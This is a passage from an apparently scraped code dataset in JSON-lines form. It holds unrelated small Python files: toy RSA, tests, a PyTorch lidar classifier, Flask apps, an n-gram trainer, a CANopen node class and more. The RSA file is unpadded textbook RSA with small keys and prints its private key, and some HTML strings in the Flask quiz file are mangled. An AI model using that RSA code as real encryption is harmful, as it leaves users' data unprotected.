multiplicativo de a no módulo mod.\n É necessário que a e mod sejam primos entre si.\"\"\"\n assert gcd(a, mod) == 1\n\n x0, x1 = 0, 1\n r0, r1 = mod, a\n\n while r1 != 0:\n q = r0 // r1\n x0, x1 = x1, x0 - q * x1\n r0, r1 = r1, r0 - q * r1\n \n if x0 < 0:\n x0 += mod\n\n assert (x0 * a) % mod == 1\n\n return x0\n\ndef generate_keys(verbose=False):\n \"\"\"Gera chaves pública e secreta de acordo com o algoritmo RSA.\n Caso verbose seja verdadeiro, imprime parâmetros do algoritmo no console.\"\"\"\n\n p = random_prime(PRIME_LOWER_BOUND, PRIME_UPPER_BOUND)\n q = random_prime(PRIME_LOWER_BOUND, PRIME_UPPER_BOUND)\n while q == p:\n q = random_prime(PRIME_LOWER_BOUND, PRIME_UPPER_BOUND)\n n = p * q\n phi = (p - 1) * (q - 1)\n\n e = randrange(phi)\n while gcd(e, phi) != 1:\n e = randrange(phi)\n\n d = multiplicative_inverse(e, phi)\n \n if verbose == True:\n print(\"p = %d\" % p)\n print(\"q = %d\" % q)\n print(\"n = %d\" % n)\n print(\"phi = %d\" % phi)\n print(\"e = %d\" % e)\n print(\"d = %d\" % d)\n\n return KeyPair(public=Key(e, n), private=Key(d, n))\n\ndef encrypt(message, public_key):\n \"\"\"Encripta uma string mensagem aplicando uma 
chave pública RSA.\"\"\"\n chunk_size = int(log(public_key.mod, 256))\n binary_message = b64encode(message.encode())\n result = []\n \n for i in range(0, len(binary_message), chunk_size):\n chunk = binary_message[i:i+chunk_size]\n plain = 0\n for byte in reversed(chunk):\n plain *= 256\n plain += byte\n coded = modular_pow(plain, public_key.exp, public_key.mod)\n result.append(hex(coded)[2:])\n return \":\".join(result)\n\ndef decrypt(cypher, private_key):\n \"\"\"Decripta um código aplicando uma chave privada RSA.\"\"\"\n result = []\n for chunk in cypher.split(\":\"):\n coded = int(chunk, 16)\n plain = modular_pow(coded, private_key.exp, private_key.mod)\n result.append(plain % 256)\n while plain > 0:\n plain = plain // 256\n result.append(plain % 256)\n return b64decode(bytes(result)).decode()\n\ndef main():\n keys = generate_keys(True)\n print()\n\n print(\"Public key =\", keys.public)\n print(\"Private key =\", keys.private)\n print()\n\n message = \"Isto é uma mensagem em português. àÀáÁãÃçÇéÉêÊÍíóÓúÚüÜ\"\n print(\"message = \\\"%s\\\"\" % message)\n print()\n\n cypher = encrypt(message, keys.public)\n print(\"cypher =\", cypher)\n print()\n\n decrypted = decrypt(cypher, keys.private)\n print(\"decrypted = \\\"%s\\\"\" % decrypted)\n print()\n\n assert message == decrypted\n\nif __name__ == '__main__':\n main()","sub_path":"rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"79137217","text":"import unittest\nfrom ctci.c2.p21 import dedups\nfrom ds.linkedlist import LinkedListNode\n\nclass TestDedups(unittest.TestCase):\n\n def test_dedups_none(self):\n head = None\n dedups(head)\n self.assertTrue(head is None)\n\n def test_dedups_one(self):\n head = LinkedListNode(0, None)\n dedups(head)\n self.assertTrue(head.next is None)\n\n","sub_path":"ctci/c2/test_p21.py","file_name":"test_p21.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"16902107","text":"# -*- coding: utf-8 -*-\n\nimport time\n\ndef main():\n i = 0\n while i <= 10000:\n print (i)\n i += 1\n\nif __name__ == \"__main__\":\n \n #簡単に処理時間を計測してみる\n start = time.time()\n \n main()\n\n elapsedTime = time.time() - start\n\n print(\"処理速度:{0}\".format(elapsedTime))\n","sub_path":"Other/elapsed_time.py","file_name":"elapsed_time.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"402449910","text":"import os\r\nimport shutil\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nfrom torchvision import datasets, transforms\r\nfrom torch.optim.lr_scheduler import StepLR\r\nimport subprocess\r\nfrom pathlib import Path\r\nimport random\r\n\r\nclass Net(nn.Module):\r\n def __init__(self):\r\n super(Net, self).__init__()\r\n \r\n #1 input image channel, 32 output channel, 3*3 square convolution kernel\r\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\r\n \r\n #32 input channels,64 output channedl, 3*3 square convolution kernel\r\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\r\n \r\n #nn.Dropout2d() will help promote independence between feature maps and should be used instead.\r\n #torch.nn.Dropout2d\r\n self.dropout1 = nn.Dropout2d(0.25)\r\n self.dropout2 = nn.Dropout2d(0.5)\r\n \r\n #apply a linear transformation to the incoming data:y=xA+b,torch.nn.Linear(in_features: int, out_features: int, bias: bool = True)\r\n self.fc1 = nn.Linear(12544, 128)\r\n self.fc2 = nn.Linear(128, 2)\r\n\r\n def forward(self, x):\r\n x = self.conv1(x)\r\n #print(\"Size after conv1:\",x.size())\r\n x = F.relu(x)\r\n x = self.conv2(x)\r\n x = F.relu(x)\r\n #print(\"Size after cov2:\",x.size())\r\n x = F.max_pool2d(x, 2)\r\n\r\n #print(\"Size after pooling:\",x.size())\r\n x = self.dropout1(x)\r\n \r\n #Flattens a contiguous range of dims in a tensor\r\n x = torch.flatten(x, 1)\r\n #print(\"Size after flattern:\", x.size())\r\n \r\n x = self.fc1(x)\r\n x = F.relu(x)\r\n x = self.dropout2(x)\r\n x = self.fc2(x)\r\n output = F.log_softmax(x, dim=1)\r\n return output\r\n\r\ndef select_train_images(ins_list,em_data_path='lidar_converted_data/class_A',cr_data_path=\"lidar_converted_data/class_B\",em_destination='lidar_train_data/class_A',cr_destination='lidar_train_data/class_B'):\r\n num_cr=0\r\n num_em=0\r\n for ins in ins_list:\r\n if ins['cr']==\"crowded\":\r\n num_cr+=1\r\n elif ins['cr']==\"empty\":\r\n num_em+=1\r\n \r\n cr_image_list=os.listdir(cr_data_path)\r\n #print(cr_image_list)\r\n selected_cr_image_list=random.sample(cr_image_list,k=num_cr)\r\n \r\n em_image_list=os.listdir(em_data_path)\r\n #print(em_image_list)\r\n selected_em_image_list=random.sample(em_image_list,k=num_em)\r\n \r\n for f1 in selected_cr_image_list:\r\n shutil.copy(cr_data_path+\"/\"+f1,cr_destination)\r\n for f2 in selected_em_image_list:\r\n shutil.copy(em_data_path+\"/\"+f2,em_destination)\r\n \r\n print(\"Lidar train data is generated\")\r\n \r\ndef select_test_images(em_data_path='lidar_converted_data/class_A',cr_data_path=\"lidar_converted_data/class_B\",em_destination='lidar_test_data/class_A',cr_destination='lidar_test_data/class_B'):\r\n cr_image_list=os.listdir(cr_data_path)\r\n em_image_list=os.listdir(em_data_path)\r\n selected_em_image_list=random.sample(em_image_list,k=50)\r\n selected_cr_image_list=random.sample(cr_image_list,k=50)\r\n \r\n for f1 in selected_em_image_list:\r\n shutil.move(em_data_path+\"/\"+f1,em_destination)\r\n \r\n for f2 in selected_cr_image_list:\r\n shutil.move(cr_data_path+\"/\"+f2,cr_destination)\r\n\r\n print(\"Lidar test data is generated\")\r\n\r\ndef delete_train_images():\r\n shutil.rmtree(\"lidar_train_data/class_A\")\r\n shutil.rmtree(\"lidar_train_data/class_B\")\r\n os.makedirs(\"lidar_train_data/class_A\")\r\n os.makedirs(\"lidar_train_data/class_B\")\r\n \r\ndef delete_test_images():\r\n shutil.rmtree(\"lidar_test_data/class_A\")\r\n shutil.rmtree(\"lidar_test_data/class_B\")\r\n 
os.makedirs(\"lidar_test_data/class_A\")\r\n os.makedirs(\"lidar_test_data/class_B\")\r\n","sub_path":"perception.py","file_name":"perception.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"425748924","text":"import random\r\nimport os\r\nimport datetime\r\nimport json\r\nfrom flask import Flask,request,render_template,Response\r\n\r\n\r\napp = Flask(__name__)\r\n\r\ndatamain = {}\r\n\r\nclass session:\r\n def __init__(self,name):\r\n self.jsonfile = os.getcwd()\r\n self.time = datetime.datetime.now()\r\n self.quest = []\r\n self.answer = []\r\n self.useranswers = []\r\n self.stage = 0\r\n if os.path.exists(self.jsonfile + '/baza/' + name + \".json\"):\r\n with open(self.jsonfile + '/baza/' + name + \".json\",'r') as js:\r\n mainj = json.load(js)\r\n else:\r\n data = {\"id\": name, \"rightanswers\": 0}\r\n with open(self.jsonfile + '/baza/' + name + \".json\", 'w', encoding='UTF-8') as js:\r\n json.dump(data, js, ensure_ascii=False)\r\n self.questgenerate()\r\n\r\n def endthis(self):\r\n result = \"\"\r\n for a in range(5):\r\n if self.answer[a] == self.useranswers[a]:\r\n result += \"
\" + str((a+1)) + \".
\" + str((a+1)) + \".
\"\r\n print(dat)\r\n return Response(response=dat, status=200, mimetype=\"text / plain\", content_type='text/event-stream')\r\n else:\r\n datamain[data['name']] = session(data['name'])\r\n datamain[data[\"name\"]].stage+=1\r\n dat = datamain[data[\"name\"]].quest[datamain[data[\"name\"]].stage] + \"
\"\r\n print(dat)\r\n return Response(response=dat, status=200, mimetype=\"text / plain\", content_type='text/event-stream')\r\n elif data['type'] == 'r':\r\n datamain[data[\"name\"]].useranswers.append(data[\"answ\"])\r\n if(datamain[data[\"name\"]].stage != 5):\r\n datamain[data[\"name\"]].stage += 1\r\n dat = datamain[data[\"name\"]].quest[datamain[data[\"name\"]].stage] + \"
\"\r\n else:\r\n dat = datamain[data[\"name\"]].endthis()\r\n print(dat)\r\n return Response(response=dat, status=200, mimetype=\"text / plain\", content_type='text/event-stream')\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n #if request.method == 'GET':\r\n # print(request.args)\r\n #return render_template('index.html')\r\n","sub_path":"FuckYou.py","file_name":"FuckYou.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"271133869","text":"import config\nimport logging\nimport requests\n\nTREESTATUS_URL = 'https://treestatus.mozilla-releng.net/trees/'\n\nlogger = logging.getLogger('autoland')\n\n\ndef tree_is_open(tree):\n # treestatus running in dev/CI is an older version, with slightly\n # different request and response structures.\n is_test_env = config.testing()\n\n r = None\n try:\n if is_test_env:\n r = requests.get('http://treestatus/%s?format=json' % tree)\n else:\n r = requests.get(TREESTATUS_URL + tree)\n\n if r.status_code == 200:\n if is_test_env:\n return r.json()['status'] == 'open'\n else:\n return r.json()['result']['status'] == 'open'\n\n elif r.status_code == 404:\n # We assume unrecognized trees are open\n return True\n\n else:\n logger.error('Unexpected response from treestatus API '\n 'for tree \"%s\": %s' % (tree, r.status_code))\n except KeyError:\n logger.error('Malformed response from treestatus API '\n 'for tree \"%s\"' % tree)\n if r is not None:\n logger.debug(r.json())\n except Exception as e:\n logger.error('Failed to determine treestatus for %s: %s' % (tree, e))\n\n return False\n\n","sub_path":"autoland/autoland/treestatus.py","file_name":"treestatus.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"101876903","text":"T=10\nfor tc in range(T):\n num=int(input())\n exp=input()\n postfix=[]\n op=[]\n for i in exp:\n if i=='(':\n op.append(i)\n elif i==')':\n while op:\n if op[-1]=='(':\n op.pop()\n break\n postfix.append(op.pop())\n elif i=='+':\n if op and op[-1]=='*':\n while op:\n if op[-1]=='(':\n break\n postfix.append(op.pop())\n op.append(i)\n elif i=='*':\n op.append(i)\n else:\n postfix.append(i)\n while op:\n postfix.append(op.pop())\n stack=[]\n for i in postfix:\n if i=='*':\n stack.append(stack.pop()*stack.pop())\n elif i=='+':\n stack.append(stack.pop() + stack.pop())\n else:\n stack.append(int(i))\n print(f'#{tc+1} {stack[0]}')","sub_path":"1224.py","file_name":"1224.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"380569203","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 29 05:29:37 2021\n\n@author: lindemberg\n\"\"\"\n\nimport requests\nimport json \n\ndef formata_dados(dados_paises):\n sigla = \"\"\n pais = \"\"\n fronteiras = []\n dados_formatado = \"SIGLA | PAÍS\"+(16* \" \") + \"| FRONTEIRAS\\n\" \n \n for dados in dados_paises:\n sigla = dados[\"code\"]\n pais = dados[\"name\"]\n fronteiras = dados[\"fronteiras\"]\n dados_formatado += sigla +\" | \" + pais + (20-len(pais)) * \" \" + \"| \" + str(fronteiras) + \" - (\" + str(len(fronteiras)) +\" país(es) faz(em) fronteira)\\n\" \n \n return dados_formatado \n\ndef ordena_decrescente(dados_paises):\n for i in range(len(dados_paises)-1):\n for j in range(i+1,len(dados_paises)):\n if len(dados_paises[i][\"fronteiras\"]) < len(dados_paises[j][\"fronteiras\"]):\n dados_paises[i] , dados_paises[j] = dados_paises[j] , dados_paises[i]\n \n# captura os dados da API, seguido da lista de dados dos paises do tipo dicionário(dict)\ndados_paises = requests.get(\"http://www.amock.io/api/fcmaia/countries\")\nlista_de_dic_paises = json.loads(dados_paises.content)\n\n#mostra como os dados foram capturados sem uma ordenação \nprint(\"SEQUENCIA FORMATADA DOS DADOS CONFORME CAPTURADO DA API\")\nprint(formata_dados(lista_de_dic_paises))\n\n#realiza a ordenação em ordem descrescente, levando em consideração a quantidade de fronteiras que cada país tem\nordena_decrescente(lista_de_dic_paises)\n\n#mostra a lista ordenada \nprint(\"SEQUENCIA ORDENADA, CONFORME A QUANTIDADE DE FRONTEIRAS\")\nprint(formata_dados(lista_de_dic_paises))","sub_path":"fronteira.py","file_name":"fronteira.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"635505048","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Class, designed to search for sources.\n\"\"\"\n# built-ins\nimport os\nfrom pathlib import Path\nfrom typing import List, Optional, Generator, Tuple, Dict\n\n# modules of the project\nfrom essence.machine import settings\nfrom essence.machine.model.utils import find_metafiles, load_as_json, get_file_extension\nfrom essence.utils import exceptions\nfrom essence.utils.containeer_abstract import ContainerAbstract\nfrom essence.utils.common import s_type, decorate\nfrom essence.utils.helpers import Meta, Uri\n\nMetas = Dict[Uri, Meta]\n\n\nclass Locator(ContainerAbstract):\n \"\"\"Class, designed to search for sources.\n \"\"\"\n FILE_TYPE = 'yml'\n _bound_type = Meta\n _raise_on_absence = exceptions.MetaDoesNotExistError\n _raise_on_overwrite = exceptions.MetaAlreadyExistError\n\n def __init__(self, metas: Optional[Metas] = None) -> None:\n \"\"\"Instantiate.\n \"\"\"\n self._storage: Metas = metas or {}\n\n def __repr__(self) -> str:\n \"\"\"Return string representation.\n \"\"\"\n return s_type(self) + f'({self.FILE_TYPE})'\n\n def discover(self, path: Optional[Path] = None) -> None:\n \"\"\"Find and save meta instances for all metafiles.\n \"\"\"\n for meta in self.search_metafiles(path):\n self.add(meta)\n\n if not self:\n raise exceptions.NoStoriesFoundError(decorate(\n f'Not a single story has been found!'\n ))\n\n def search_metafiles(self, path: Optional[Path] = None) -> Generator[Meta, None, None]:\n \"\"\"Get metas for all folders with stories in them.\n \"\"\"\n metafiles = find_metafiles(path)\n\n for filename in metafiles:\n contents = load_as_json(filename)\n # noinspection PyArgumentList\n meta = self._bound_type(**contents, uri=filename.parent.name, path=filename)\n yield meta\n\n # pylint: disable=W0221\n def iterate_over_content(self, story_name: str) -> Generator[Tuple[str, Path], None, None]:\n \"\"\"Iterate over all filenames.\n \"\"\"\n for meta in self.values():\n if meta.uri != story_name:\n continue\n\n base_path = meta.path.parent\n\n for path, _, files in os.walk(str(base_path.absolute())):\n for file in files:\n full_path = Path(path) / file.lower()\n if (file != settings.META_FILE_NAME and\n get_file_extension(full_path) == self.FILE_TYPE):\n yield self.FILE_TYPE, full_path\n\n def get_stories(self) -> List[Tuple[str, str]]:\n \"\"\"Get uris and names for all known stories.\n \"\"\"\n titles = [(x.uri, x.name) for x in self.values()]\n return titles\n","sub_path":"essence/machine/model/locator.py","file_name":"locator.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"14599343","text":"import re\nimport sys\nfrom .common_errors import CommonErrors\nfrom .corpora import OANCCorpus, TestCorpus\nfrom .serial import Cereal\n\n\nclass Trainer:\n def __init__(self, reduced=True, corpus=OANCCorpus, corrections=True, serializer=Cereal):\n if corrections:\n self.corpus = corpus(errors=CommonErrors)\n else:\n self.corpus = corpus()\n self.reduced = reduced\n self.serializer = serializer()\n self.data = {}\n self.unigrams_list = []\n self.bigrams_list = []\n self.trigrams_list = []\n self.read_corpus()\n self.train()\n\n def read_corpus(self):\n for line in self.corpus.read_corpus():\n self.unigrams_list += self.words(line)\n self.bigrams_list += self.bigrams(line)\n self.trigrams_list += self.trigrams(line)\n\n def train(self):\n unigram_count = self.train_model(self.unigrams_list)\n bigram_count = self.train_model(self.bigrams_list)\n trigram_count = self.train_model(self.trigrams_list)\n if self.reduced:\n unigram_count = self.reduce(unigram_count)\n bigram_count = self.reduce(bigram_count)\n trigram_count = self.reduce(trigram_count)\n unigram_probs = self.get_probs(unigram_count)\n bigram_probs = self.get_probs(bigram_count)\n trigram_probs = self.get_probs(trigram_count)\n self.norm(unigram_probs)\n self.norm(bigram_probs)\n self.norm(trigram_probs)\n self.data['unigram_count'] = unigram_count\n self.data['unigram_probs'] = unigram_probs\n self.data['bigram_probs'] = bigram_probs\n self.data['trigram_probs'] = trigram_probs\n\n def reduce(self, count):\n new_count = {}\n for key, value in count.items():\n if value > 1:\n new_count[key] = value\n return new_count\n\n def pickle(self):\n name = self.corpus.name\n self.serializer.serialize(name, self.data)\n\n def norm(self, probs):\n pmax = max(probs.values())\n pmin = min(probs.values())\n denom = pmax - pmin\n if denom == 0:\n denom = 1\n for key, value in probs.items():\n probs[key] = ((value - pmin) / denom)\n\n def get_probs(self, count):\n prob_dict = {}\n denom = sum(count.values())\n for gram in count:\n prob_dict[gram] = (count[gram] / denom)\n return prob_dict\n\n def bigrams(self, text):\n l = []\n lines = filter(None, re.split('[.?!\\n]+', text))\n for line in lines:\n mod_line = [\"^\"] + self.words(line) + [\"$\"]\n for i in range(len(mod_line) - 1):\n l.append((mod_line[i], mod_line[i + 1]))\n return l\n\n def trigrams(self, text):\n l = []\n lines = filter(None, re.split('[.?!\\n]+', text))\n for line in lines:\n mod_line = [\"^\"] + self.words(line) + [\"$\"]\n for i in range(len(mod_line) - 2):\n l.append((mod_line[i], mod_line[i + 1], mod_line[i + 2]))\n return l\n\n def words(self, text):\n l = re.findall('[a-z\\']+', text.lower())\n return l\n\n def train_model(self, features):\n model = {}\n for f in features:\n if f in model:\n model[f] += 1\n else:\n model[f] = 1\n return model\n\n\ndef whathappened(time, unis, bis, tris):\n print(\"Took: \" + str(time) + \" seconds\")\n print(\"Added: \" + str(unis) + \" unigrams\")\n print(\"Added: \" + str(bis) + \" bigrams\")\n print(\"Added: \" + str(tris) + \" trigrams\")\n\nif __name__ == \"__main__\":\n import time\n corpus = OANCCorpus\n corrections = CommonErrors\n reduced = True\n if 'test' in sys.argv:\n corpus = TestCorpus\n corrections = None\n reduced = False\n start = time.clock()\n t = Trainer(corrections=corrections, corpus=corpus, reduced=reduced)\n t.pickle()\n end = time.clock() - start\n unis = len(t.data['unigram_probs'].keys())\n bis = len(t.data['bigram_probs'].keys())\n tris = len(t.data['trigram_probs'].keys())\n 
whathappened(end, unis, bis, tris)\n","sub_path":"app/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"191609057","text":"import matplotlib.pyplot as plt\n\n# set up x values and y values\n\nx_values = list(range(5000))\ny_values = [x**3 for x in x_values]\n\n# set the title of the plot\nplt.title('Cubic Values', fontsize=15)\n\n# set the axes of the plot\nplt.xlabel('Values', fontsize=10)\nplt.ylabel('Cubic Values', fontsize=10)\n\n# set the scale\nplt.tick_params(axis='both', which='major', labelsize=5)\n# draw the plot\nplt.scatter(x_values, y_values, c=y_values, cmap=plt.cm.Reds, s=20)\nplt.show()\n\n\n\n","sub_path":"practice/15.02_cubic_diagram.py","file_name":"15.02_cubic_diagram.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"163274178","text":"#!/usr/bin/python\nimport fresh_tomatoes\nimport media\n\n\ndef main():\n shawshank = media.Movie(\"The Shawshank Redemption\",\n \"An innocent man escapes from prison.\",\n 1994,\n \"http://ia.media-imdb.com/images/M/MV5BODU4MjU4N\" +\n \"jIwNl5BMl5BanBnXkFtZTgwMDU2MjEyMDE@._V1_SX214_A\" +\n \"L_.jpg\",\n \"https://www.youtube.com/watch?v=6hB3S9bIaco\",\n 9.3)\n\n love_actually = media.Movie(\"Love Actually\",\n \"Intertangled romance ensues over Christmas.\",\n 2003,\n \"http://ia.media-imdb.com/images/M/MV5BMTY4N\" +\n \"jQ5NDc0Nl5BMl5BanBnXkFtZTYwNjk5NDM3._V1_SX2\" +\n \"14_AL_.jpg\",\n \"https://www.youtube.com/watch?v=KdzH6a-XEGM\",\n 7.7)\n\n wedding_crashers = media.Movie(\"Wedding Crashers\",\n \"Two guys crash weddings and fall in love.\",\n 2005,\n \"http://ia.media-imdb.com/images/M/MV5BM\" +\n \"Tc4NTUyNzU4MV5BMl5BanBnXkFtZTcwMzcyMTky\" +\n \"MQ@@._V1_SX214_AL_.jpg\",\n \"https://www.youtube.com/watch?v=VYrEQbt\" +\n \"V2V4\",\n 7.0)\n\n amelie = media.Movie(\"Amelie\",\n \"A young eccentric French girl tries to find the\" +\n \" origin of some mysterious photos.\",\n 2001,\n \"http://ia.media-imdb.com/images/M/MV5BMTYzNjkxMT\" +\n \"czOF5BMl5BanBnXkFtZTgwODg5NDc2MjE@._V1_SY317_CR0,0\" +\n \",214,317_AL_.jpg\",\n \"https://www.youtube.com/watch?v=sECzJY07oK4\",\n 8.4)\n\n mohicans = media.Movie(\"The Last of the Mohicans\",\n \"An innocent man escapes from prison.\",\n 1992,\n \"http://ia.media-imdb.com/images/M/MV5BMTQ0MjQ5ND\" +\n \"AzMV5BMl5BanBnXkFtZTcwNjYzMjE2MQ@@._V1_SY317_CR8\" +\n \",0,214,317_AL_.jpg\",\n \"https://www.youtube.com/watch?v=yaQeVnN6pUc\",\n 7.8)\n\n once = media.Movie(\"Once\",\n \"Two buskers in Dublin are star-crossed.\",\n 2006,\n \"http://ia.media-imdb.com/images/M/MV5BMTEwNjExOTc2MT\" +\n \"JeQTJeQWpwZ15BbWU3MDYzODQ3NDE@._V1_SY317_CR0,0,214,3\" +\n \"17_AL_.jpg\",\n \"https://www.youtube.com/watch?v=FWJIylZ8VyM\",\n 7.9)\n\n my_faves = [shawshank, love_actually, wedding_crashers, amelie, mohicans,\n once]\n\n # Send my favorite movies to Fresh Tomatoes HTML generator\n fresh_tomatoes.open_movies_page(my_faves)\n\nif __name__ == '__main__':\n main()","sub_path":"entertainment_console.py","file_name":"entertainment_console.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"646283220","text":"from .sdo import SdoClient\nfrom .nmt import NmtMaster\nfrom .emcy import EmcyConsumer\nfrom .pdo import PdoNode\nfrom . import objectdictionary\n\n\nclass Node(object):\n \"\"\"A CANopen slave node.\n\n :param int node_id:\n Node ID (set to None or 0 if specified by object dictionary)\n :param object_dictionary:\n Object dictionary as either a path to a file, an ``ObjectDictionary``\n or a file like object.\n :type object_dictionary: :class:`str`, :class:`canopen.ObjectDictionary`\n \"\"\"\n\n def __init__(self, node_id, object_dictionary):\n self.network = None\n\n if not isinstance(object_dictionary,\n objectdictionary.ObjectDictionary):\n object_dictionary = objectdictionary.import_od(\n object_dictionary, node_id)\n self.object_dictionary = object_dictionary\n\n self.id = node_id or self.object_dictionary.node_id\n\n #: Enable WORKAROUND for reversed PDO mapping entries\n self.curtis_hack = False\n\n self.sdo = SdoClient(0x600 + self.id, 0x580 + self.id, object_dictionary)\n self.pdo = PdoNode(self)\n self.nmt = NmtMaster(self.id)\n self.emcy = EmcyConsumer()\n\n def associate_network(self, network):\n self.network = network\n self.sdo.network = network\n self.pdo.network = network\n self.nmt.network = network\n network.subscribe(self.sdo.tx_cobid, self.sdo.on_response)\n network.subscribe(0x700 + self.id, self.nmt.on_heartbeat)\n network.subscribe(0x80 + self.id, self.emcy.on_emcy)\n\n def remove_network(self):\n self.network.unsubscribe(self.sdo.tx_cobid)\n self.network.unsubscribe(0x700 + self.id)\n self.network.unsubscribe(0x80 + self.id)\n self.network = None\n self.sdo.network = None\n self.pdo.network = None\n self.nmt.network = None\n\n def store(self, subindex=1):\n \"\"\"Store parameters in non-volatile memory.\n\n :param int subindex:\n 1 = All parameters\\n\n 2 = Communication related parameters\\n\n 3 = Application related parameters\\n\n 4 - 127 = Manufacturer specific\n \"\"\"\n self.sdo.download(0x1010, subindex, b\"save\")\n\n def restore(self, subindex=1):\n \"\"\"Restore default parameters.\n\n :param int subindex:\n 1 = All parameters\\n\n 2 = Communication related parameters\\n\n 3 = Application related parameters\\n\n 4 - 127 = Manufacturer specific\n \"\"\"\n self.sdo.download(0x1011, subindex, b\"load\")\n","sub_path":"canopen/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"541157851","text":"from flask import render_template, request, jsonify, abort\nimport logging\nimport json\nimport os\nimport re\nfrom datetime import datetime, date\n\nfrom app import app\nfrom loggers import request_file_hendler\nfrom config import base_dir\n\n\ndef get_file_name(log_name):\n\t\"\"\"Return name of the file from app config error.log/request.log\"\"\"\n\tif log_name == 'errors':\n\t\treturn app.config['ERROR_LOG_FILE']\n\telse:\n\t\treturn app.config['REQUEST_LOG_FILE']\n\ndef get_error_name(stacktrace):\n\t\"\"\"Parse the stacktrace of error and return name of Error\"\"\"\n\tlines = stacktrace.split('\\n')\n\tlast_line = lines[len(lines) - 2]\n\tresult = re.search(r'^(\\w+Error)', last_line);\n\treturn result.group(0)\n\ndef get_list_of_errors(full_log, **kvargs):\n\t\"\"\"Return list of errors from error.log.\n\n\tKeyword arguments:\n\tfull_log -- string line containing full error.log\n\t**kvargs {\n\t\terrors_type -- list of errors which user enter in front (default \"\" i.e. All)\n\t\tdate -- datetime(%Y-%m-%d) date which user enter in front \n\t\t\t\t(in start date=\"\" i.e. All date, if user didn't enter date,\n\t\t\t\t date=today datetime(%Y-%m-%d))\n\t}\n\n\t\"\"\"\n\tfull_log += \"##\"\n\tsearch_result = re.findall(\n\t\tr'(\\d{2}\\:\\d{2}\\:\\d{2} \\d{2}\\/\\d{2}\\/\\d{4}) \\- (.*?)(Traceback .*?)##',\n\t\tfull_log, re.S)\n\t# For all type of errors create a list of dictionaries \n\t# with information about error.\n\tif not kvargs['errors_type']:\n\t\terrors = [{\"datetime\": datetime.strptime(line[0], '%H:%M:%S %d/%m/%Y'), \n\t\t\t\t\t\"msg\": line[1], \n\t\t\t\t\t\"stacktrace\": line[2],\n\t\t\t\t\t\"error_name\": get_error_name(line[2])} for line in search_result] \n\t# Add a filter if error_name != errors_type, this error not add to result.\n\telse:\n\t\terrors = filter(lambda error: error[\"error_name\"] in kvargs['errors_type'],\n\t\t\t\t\t [{\"datetime\": datetime.strptime(line[0], '%H:%M:%S %d/%m/%Y'), \n\t\t\t\t\t \"msg\": line[1], \n\t\t\t\t\t \"stacktrace\": line[2],\n\t\t\t\t\t \"error_name\": get_error_name(line[2])} for line in search_result])\n\t# Add a filter if error datetime != kvargs['date'], this error not add to result.\n\tif kvargs['date']:\n\t\terrors = filter(lambda error: \n\t\t\terror[\"datetime\"].strftime('%d %m %Y') == kvargs['date'].strftime('%d %m %Y'),\n\t\t\terrors)\n\n\t# Sorting result list by date (early -> late).\n\terrors.sort(key = lambda i: i[\"datetime\"], reverse=True)\n\treturn errors\n\ndef get_list_of_request(full_log, **kvargs):\n\t\"\"\"Return list of request from request.log.\n\n\tKeyword arguments:\n\tfull_log -- string line containing full error.log\n\t**kvargs {\n\t\tip -- string ip adress which interested by user (default \"\" i.e. All)\n\t\trequest_date -- datetime(%Y-%m-%d) date which user enter \n\t\t\t\t\t\tin front (default \"\" i.e. All)\n\t\tsn -- string number of counter which interested \n\t\t\t by user (default \"\" i.e. All)\n\t\tstart_date -- datetime(%Y-%m-%d) date which user \n\t\t\t\t\t enter in front (default \"\" i.e. 
